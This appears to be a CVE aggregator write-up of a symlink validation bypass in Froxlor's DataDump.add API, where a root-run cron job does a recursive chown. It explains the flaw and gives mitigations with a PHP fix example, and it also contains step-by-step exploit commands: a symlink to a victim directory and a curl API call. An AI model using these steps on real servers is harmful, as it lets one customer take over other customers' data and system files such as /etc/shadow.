Froxlor, Symlink Validation Bypass, CVE-2024-XXXX (Critical)


The vulnerability stems from an incomplete patch for CVE-2023-6069. After that fix, symlink validation was added to `FileDir::makeCorrectDir()` via a `$fixed_homedir` parameter, which walks each path component and checks for symlinks that escape the customer’s home directory. All customer‑facing API commands (e.g., DirProtections.php, DirOptions.php, Ftps.php, SubDomains.php) pass this parameter—except DataDump.add(). In DataDump.php:88, `makeCorrectDir()` is called without the `$fixed_homedir` argument, so the symlink validation is bypassed.
The unvalidated path flows into a cron task (lib/Froxlor/Api/Commands/DataDump.php:133) that creates a customer data dump. When `ExportCron::handle()` runs as root, it executes `chown -R` on the user‑supplied destination path (lib/Froxlor/Cron/System/ExportCron.php:232). Because `chown -R` follows symlinks in its target argument, an attacker can create a symlink inside their document root pointing to any directory on the system (e.g., `/etc` or another customer’s home). The recursive `chown` then changes the ownership of the target directory and all its contents to the attacker’s UID/GID.
The `Validate::validate()` call on line 86 uses an empty pattern that only strips control characters, and `makeSecurePath()` removes `..` and shell metacharacters but does not check for symlinks. As a result, an authenticated customer with FTP/SSH access can schedule a data export via the API, pointing the `path` parameter to a malicious symlink. When the hourly cron job runs, the system recursively changes ownership of the linked directory, granting the attacker full control over that directory and its files.
This allows horizontal privilege escalation (taking over other customers’ data) and vertical privilege escalation (gaining read/write access to system files such as `/etc/passwd` and `/etc/shadow`). The attack requires only a single API call and a symlink, with impact delayed until the next cron run, making detection difficult.

dailycve form:

Platform: Froxlor
Version: before 2.1.0
Vulnerability: Incomplete symlink patch
Severity: Critical
Date: 2024-03-08

Prediction: Patch expected 2024-03-08

Analytics under heading What Undercode Say:

Check if the vulnerable code path exists
grep -n "makeCorrectDir" lib/Froxlor/Api/Commands/DataDump.php
Expected output (vulnerable): $path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path);
Fixed version should show the call with a second argument: `FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot'])`
Simulate the cron task that runs as root
sudo -u root php -r "include 'lib/Froxlor/Cron/System/ExportCron.php'; (new ExportCron())->handle();"

How to exploit:

Step 1: Create a symlink inside the customer's docroot
ln -s /var/customers/webs/victim_customer /var/customers/webs/attacker_customer/steal
Step 2: Schedule data export via API
curl -X POST -H "Content-Type: application/json" \
-d '{"header":{"apikey":"CUSTOMER_API_KEY","secret":"CUSTOMER_API_SECRET"},"body":{"command":"DataDump.add","params":{"path":"steal","dump_web":"1"}}}' \
https://panel.example.com/api.php
Step 3: Wait for the cron job (typically hourly) to execute the chown -R
After cron runs, the attacker owns /var/customers/webs/victim_customer/

Protection from this CVE

  • Apply the patch that adds `$customer['documentroot']` as the second parameter to `makeCorrectDir()` in DataDump.php:88.
  • Modify `ExportCron.php:232` to check for symlinks before running `chown -R` (e.g., use `is_link()` and skip the operation if a symlink is detected).
  • Alternatively, use `chown -h` (no‑dereference) to change the ownership of the symlink itself rather than its target.
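As an added example (not Froxlor's own code), the two protections above sketched in PHP: a per-component symlink walk in the spirit of the `$fixed_homedir` check, and a cron-side guard that refuses a recursive chown on a symlink or on a path resolving outside the customer home. The function names `validateCustomerPath` and `safeChownRecursive` are assumed.

```php
<?php
// Added example (not Froxlor's code); function names assumed. $homedir must be an existing, absolute, symlink-free directory.

/**
 * Walk each component of a customer-supplied relative path and reject any
 * symlink whose target resolves outside $homedir. Returns the absolute path
 * (unresolved, so later checks still see the link) or null on failure.
 */
function validateCustomerPath(string $homedir, string $path): ?string
{
    $home = realpath($homedir);
    if ($home === false) {
        return null;
    }
    $home = rtrim($home, '/');
    // Keep only a conservative character set, then drop '.', '..' and empties
    $path = preg_replace('/[^A-Za-z0-9_.\/-]/', '', $path);
    $parts = array_filter(explode('/', $path),
        fn(string $p): bool => $p !== '' && $p !== '.' && $p !== '..');

    $current = $home;
    foreach ($parts as $part) {
        $current .= '/' . $part;
        // is_link() must come first: file_exists() is false for dangling links
        if (is_link($current)) {
            $target = realpath($current);
            if ($target === false || strpos($target . '/', $home . '/') !== 0) {
                return null; // symlink escapes the customer home directory
            }
        }
    }
    return $current;
}

/**
 * Cron-side guard for the privileged chown: refuse symlinks outright and
 * refuse any destination whose canonical path lies outside $homedir.
 */
function safeChownRecursive(string $homedir, string $dest, string $owner): bool
{
    $home = rtrim((string) realpath($homedir), '/');
    $real = realpath($dest);
    if ($home === '' || is_link($dest) || $real === false
        || strpos($real . '/', $home . '/') !== 0) {
        return false; // never chown -R through a link or outside the home
    }
    exec('chown -R ' . escapeshellarg($owner) . ' ' . escapeshellarg($real), $o, $rc);
    return $rc === 0;
}
```

Because the export runs later as root, an API-time check alone leaves a window in which the link can be created afterwards; the cron-side guard repeats the check immediately before the privileged operation.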

Impact

  • Horizontal privilege escalation to other customers’ web files, databases, and emails.
  • Vertical privilege escalation to system directories (e.g., /etc), allowing read/write access to `/etc/passwd` and `/etc/shadow` for root compromise.
  • Full data breach of any targeted directory, including configuration files and application secrets.
  • Service disruption by changing ownership of critical system directories.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
